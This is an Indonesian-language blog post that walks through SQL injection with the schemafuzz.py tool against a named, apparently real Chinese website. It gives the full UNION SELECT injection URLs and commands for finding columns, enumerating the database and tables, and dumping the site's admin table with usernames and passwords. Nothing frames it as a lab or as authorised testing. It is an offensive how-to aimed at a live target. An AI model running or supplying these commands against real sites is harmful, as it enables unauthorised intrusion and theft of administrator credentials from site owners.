/ / TUTORIAL SQLi DENGAN SCHEMAFFUZ PY

TUTORIAL SQLi DENGAN SCHEMAFFUZ PY


Pada kesempatan kali ini saya akan berbagi tutorial singkat SQLi menggunakan schemafuzz.py. untuk yang belum mengerti pengertian dari SQLI dan schemafuzz silakan cari di wikipedia :) 
Oke langsung saja, langkah pertama download schemafuzz DISINI. Langkah berikutnya install python, jika belum ada bisa di download DISINI. Jika python sudah terinstal, langsung jalankan di cmd. Untuk mempermudah silahkan rename schemafuzz.py menjadi root.py dan simpan di Direktori C.
  • Siapkan target, disini saya menggunakan "http://www.perfectpotion.net.cn/article.php?id=36"
  • Buka cmd, ketikkan perintah "cd c:\" lalu "dir" anpa tanda kutip.
  • Kemudian cari jumlah column degnan mengetikan perintah dibawah tanpa tanda kutip, (Lihat Gambar).

    "root.py --findcol -u http://www.perfectpotion.net.cn/article.php?id=36"


    Maka hasilnya akan tampak seperti gambar dibawah :

    Tutorial Schemafuzz
  • Dari gambar di atas bisa kita lihat bahwa jumlah column adalah 20, null column pada column ke-1. Seperti di SQLi manual, column 1 adalah angka ajaib.
  • Langkah selanjutnya mencari nama database. Ketikkan perintah : root.py --dbs -u (darkc0de URL)

    "root.py --dbs -u http://www.perfectpotion.net.cn/article.php?id=36+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19"

    Lihat hasilnya :

    Tutorial SchemafuzzDari gambar di atas sudah terlihat nama database yaitu "yf".
  • Untuk melihat table dan column, kita ketikkan perintah "root.py --schema -u (darkc0de URL) -D (database name)

    "root.py --schema -u http://www.perfectpotion.net.cn/article.php?id=36+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 -D yf"

    Tutorial SchemafuzzMaka hasilnya akan tampak dalam gambar berikut :

    Tutorial Schemafuzz
  • Dari gambar di atas sudah terlihat jelas nama table dan column, untuk melihat data dalam column ketikkan perintah "root.py --dump -u (darkc0de URL) -D (database name) -T (table name) -C (column name)

    *Untuk menghindari error dalam pembacaan data, saya hanya akan mengambil data di table "admin" dan column "ID,AdminName,AdminPass" saja.

    "root.py --dump -u http://www.perfectpotion.net.cn/article.php?id=36+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 -D yf -T admin -C ID,AdminName,AdminPass"
SEMOGA BERMNFAAT DAN SALAM  ( STATUS-HAMBA )
Share on Google Plus

About Unknown

This is a short description in the author block about the author. You edit it by entering text in the "Biographical Info" field in the user admin panel.
    Blogger Comment
    Facebook Comment

0 comments:

Post a Comment

Subscribe to: Post Comments ( Atom )